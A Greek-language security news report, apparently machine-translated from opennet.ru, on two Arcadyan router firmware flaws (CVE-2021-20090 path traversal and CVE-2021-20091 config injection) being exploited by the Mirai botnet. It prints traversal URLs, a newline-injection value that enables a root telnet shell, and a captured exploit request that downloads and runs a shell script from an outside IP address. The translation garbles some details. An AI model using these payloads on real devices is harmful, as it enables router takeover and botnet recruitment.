Μια μαζική επίθεση έχει καταγραφεί στο δίκτυο εναντίον οικιακών δρομολογητών των οποίων το υλικολογισμικό χρησιμοποιεί εφαρμογή διακομιστή HTTP από την εταιρεία Arcadyan. Για να αποκτηθεί ο έλεγχος των συσκευών, χρησιμοποιείται ένας συνδυασμός δύο ευπάθειας που επιτρέπει την απομακρυσμένη εκτέλεση αυθαίρετου κώδικα με δικαιώματα ρίζας. Το πρόβλημα επηρεάζει ένα αρκετά ευρύ φάσμα δρομολογητών ADSL από τα Arcadyan, ASUS και Buffalo, καθώς και συσκευές που παρέχονται με τις μάρκες Beeline (το πρόβλημα επιβεβαιώνεται στο Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone και άλλους τηλεπικοινωνιακούς φορείς. Σημειώνεται ότι το πρόβλημα είναι παρόν στο Arcadyan firmware για περισσότερα από 10 χρόνια και σε αυτό το διάστημα έχει καταφέρει να μετεγκατασταθεί σε τουλάχιστον 20 μοντέλα συσκευών από 17 διαφορετικούς κατασκευαστές.
Η πρώτη ευπάθεια, το CVE-2021-20090, καθιστά δυνατή την πρόσβαση σε οποιοδήποτε σενάριο διεπαφής ιστού χωρίς έλεγχο ταυτότητας. Η ουσία της ευπάθειας είναι ότι στη διεπαφή ιστού, ορισμένοι κατάλογοι μέσω των οποίων αποστέλλονται εικόνες, αρχεία CSS και σενάρια JavaScript είναι προσβάσιμοι χωρίς έλεγχο ταυτότητας. Σε αυτήν την περίπτωση, οι κατάλογοι για τους οποίους επιτρέπεται η πρόσβαση χωρίς έλεγχο ταυτότητας ελέγχονται χρησιμοποιώντας την αρχική μάσκα. Ο καθορισμός χαρακτήρων "../" στις διαδρομές για μετάβαση στον γονικό κατάλογο αποκλείεται από το υλικολογισμικό, αλλά η χρήση του συνδυασμού "..%2f" παραλείπεται. Έτσι, είναι δυνατό να ανοίξετε προστατευμένες σελίδες κατά την αποστολή αιτημάτων όπως "http://192.168.1.1/images/..%2findex.htm".
Η δεύτερη ευπάθεια, CVE-2021-20091, επιτρέπει σε έναν πιστοποιημένο χρήστη να κάνει αλλαγές στις ρυθμίσεις συστήματος της συσκευής στέλνοντας ειδικά διαμορφωμένες παραμέτρους στο σενάριο apply_abstract.cgi, το οποίο δεν ελέγχει την παρουσία χαρακτήρα νέας γραμμής στις παραμέτρους . Για παράδειγμα, όταν εκτελεί μια λειτουργία ping, ένας εισβολέας μπορεί να καθορίσει την τιμή "192.168.1.2%0AARC_SYS_TelnetdEnable=1" στο πεδίο με τη διεύθυνση IP που ελέγχεται και το σενάριο, κατά τη δημιουργία του αρχείου ρυθμίσεων /tmp/etc/config/ .glbcfg, θα γράψει τη γραμμή "AARC_SYS_TelnetdEnable=1" σε αυτήν ", η οποία ενεργοποιεί τον διακομιστή telnetd, ο οποίος παρέχει απεριόριστη πρόσβαση στο φλοιό εντολών με δικαιώματα ρίζας. Ομοίως, ορίζοντας την παράμετρο AARC_SYS, μπορείτε να εκτελέσετε οποιονδήποτε κώδικα στο σύστημα. Η πρώτη ευπάθεια καθιστά δυνατή την εκτέλεση ενός προβληματικού σεναρίου χωρίς έλεγχο ταυτότητας με την πρόσβαση σε αυτό ως "/images/..%2fapply_abstract.cgi".
Για να εκμεταλλευτεί τα τρωτά σημεία, ένας εισβολέας πρέπει να μπορεί να στείλει ένα αίτημα στη θύρα δικτύου στην οποία εκτελείται η διεπαφή Ιστού. Κρίνοντας από τη δυναμική της εξάπλωσης της επίθεσης, πολλοί χειριστές αφήνουν πρόσβαση στις συσκευές τους από το εξωτερικό δίκτυο για να απλοποιήσουν τη διάγνωση προβλημάτων από την υπηρεσία υποστήριξης. Εάν η πρόσβαση στη διεπαφή περιορίζεται μόνο στο εσωτερικό δίκτυο, μια επίθεση μπορεί να πραγματοποιηθεί από εξωτερικό δίκτυο χρησιμοποιώντας την τεχνική "DNS rebinding". Τα τρωτά σημεία χρησιμοποιούνται ήδη ενεργά για τη σύνδεση δρομολογητών στο botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Σύνδεση: κλείσιμο User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time_3D5. 212.192.241.7%0A ARC_SYS_TelnetdEnable=1& %0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
Πηγή: opennet.ru